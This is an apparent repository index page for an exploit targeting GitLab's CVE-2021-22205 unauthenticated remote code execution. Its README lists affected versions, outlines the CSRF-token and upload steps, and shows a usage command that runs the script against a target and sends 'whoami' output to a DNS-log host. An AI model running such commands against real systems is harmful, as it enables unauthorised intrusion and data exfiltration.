https://github.com/r0eXpeR/CVE-2021-22205
CVE-2021-22205 Unauthorized RCE
https://github.com/r0eXpeR/CVE-2021-22205
Last synced: 4 months ago
JSON representation
CVE-2021-22205 Unauthorized RCE
- Host: GitHub
- URL: https://github.com/r0eXpeR/CVE-2021-22205
- Owner: r0eXpeR
- Created: 2021-10-28T14:02:51.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2021-10-28T14:20:05.000Z (about 4 years ago)
- Last Synced: 2024-11-21T18:39:07.673Z (12 months ago)
- Language: Python
- Homepage:
- Size: 752 KB
- Stars: 69
- Watchers: 2
- Forks: 29
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - r0eXpeR/CVE-2021-22205 - CVE-2021-22205 Unauthorized RCE (Python)
README
# CVE-2021-22205
**影响版本:**
* Gitlab CE/EE < 13.10.3
* Gitlab CE/EE < 13.9.6
* Gitlab CE/EE < 13.8.8
**Usage**
```
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
```

**获取csrf-token:**

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce


**ref:**
* https://hackerone.com/reports/1154542
* https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
* https://forum.ywhack.com/viewthread.php?tid=115611
* https://forum.ywhack.com/viewthread.php?tid=116706
* https://github.com/RedTeamWing/CVE-2021-22205